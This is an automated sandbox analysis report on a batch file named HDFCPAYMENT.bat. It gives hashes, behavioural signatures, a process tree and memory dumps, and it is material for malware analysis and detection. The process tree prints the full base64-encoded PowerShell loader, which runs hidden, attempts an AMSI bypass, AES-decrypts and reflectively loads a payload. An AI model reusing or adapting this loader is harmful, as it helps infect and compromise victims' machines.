d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7

General

Target

HDFCPAYMENT.bat
Size

413KB
MD5

b40af4f36e64a53783d8c3dde233dc1a
SHA1

71a43ec06c566ea2fdbf898104a4c3c02b87bb72
SHA256

d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7
SHA512

aa59ea51074b40df9bc183eae7d40e065e0d0e370ccf530dc86f0d6da621e6d857b306c1fd4a9ade7787ebed26cb1f012564a235b8597e04a83a95a531f7cfb3
SSDEEP

6144:+7xGCfsp8mrunqNHsO+AyLT+9lAx1nZJoEU/ghKWv9yEZIYe7uAtYJ5bNrJ8Wpwy:g0amrgUH6NvvZvUY8+9ytiAtqpOWpLf

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2880	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 368	2164	cmd.exe	30
PID 2164 wrote to memory of 368	2164	cmd.exe	30
PID 2164 wrote to memory of 368	2164	cmd.exe	30
PID 368 wrote to memory of 2876	368	cmd.exe	32
PID 368 wrote to memory of 2876	368	cmd.exe	32
PID 368 wrote to memory of 2876	368	cmd.exe	32
PID 368 wrote to memory of 2880	368	cmd.exe	33
PID 368 wrote to memory of 2880	368	cmd.exe	33
PID 368 wrote to memory of 2880	368	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\HDFCPAYMENT.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\HDFCPAYMENT.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\HDFCPAYMENT.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUV1ZUVkZKSlRrZFNRVTVFVDAxNElDZ29hVk5VVWtsT1IxSkJUa1JQVFhkVFZGSkpUa2RTUVU1RVQwMXlVMVJTU1U1SFVrRk9SRTlOSUMxVFZGSkpUa2RTUVU1RVQwMVZVMVJTU1U1SFVrRk9SRTlOYzFOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDFDVTFSU1NVNUhVa0ZPUkU5TllWTlVVa2xPUjFKQlRrUlBUWE5UVkZKSlRrZFNRVTVFVDAxcFUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFZCVFZGSkpUa2RTUVU1RVQwMWhVMVJTU1U1SFVrRk9SRTlOY2xOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TmJsTlVVa2xPUjFKQlRrUlBUV2RUVkZKSlRrZFNRVTVFVDAwZ0lsTlVVa2xPUjFKQlRrUlBUV2hUVkZKSlRrZFNRVTVFVDAxMGRIQnpVMVJTU1U1SFVrRk9SRTlOT2xOVVVrbE9SMUpCVGtSUFRTOVRWRkpKVGtkU1FVNUVUMDB2VTFSU1NVNUhVa0ZPUkU5Tk1GTlVVa2xPUjFKQlRrUlBUWGhUVkZKSlRrZFNRVTVFVDAwd1UxUlNTVTVIVWtGT1JFOU5MbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOTDFOVVVrbE9SMUpCVGtSUFRUaFRWRkpKVGtkU1FVNUVUMDFhVTFSU1NVNUhVa0ZPUkU5TlJGTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5kRk5VVWtsT1IxSkJUa1JQVFhoVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOSWlrdVEyOXVkR1Z1ZEM1U1pYQnNZV05sS0NkQlFrTW5MQ2NuS1NrZ0xVVnljbTl5UVdOMGFXOXVJRk5wYkdWdWRHeDVRMjl1ZEdsdWRXVTcnKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c3RlbUFtc2lCeXBhc3MgLURpc2FibGVFVFcgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIlRoaXMgc3lzdGVtIGhhcyBhIG1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gRFpXT00oJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRG1mMkdLcjRRanVwMDAxS08rblF6UW1xMzM1azJLdFh5Mkg5UE1GbnlzZz0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCd3emN1VzhYUFVIZzBKcktHMXIzTzZRPT0nKTskSVVSSFo9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JExKWlRFPSRJVVJIWi5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JElVUkhaLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JExKWlRFO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRMWEpUQz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRWVlBMVj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFJHRk9VPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJExYSlRDLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUkdGT1UuQ29weVRvKCRWVlBMVik7JFJHRk9VLkRpc3Bvc2UoKTskTFhKVEMuRGlzcG9zZSgpOyRWVlBMVi5EaXNwb3NlKCk7JFZWUExWLlRvQXJyYXkoKTt9JFVFSkdUPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKERaV09NIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJFVFSkdULCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "
    3⤵
    PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2880

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2880-4-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

Filesize
4KB

Download
memory/2880-5-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/2880-8-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-7-0x00000000024A0000-0x00000000024A8000-memory.dmp

Filesize
32KB

Download
memory/2880-6-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-9-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-10-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-11-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-12-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads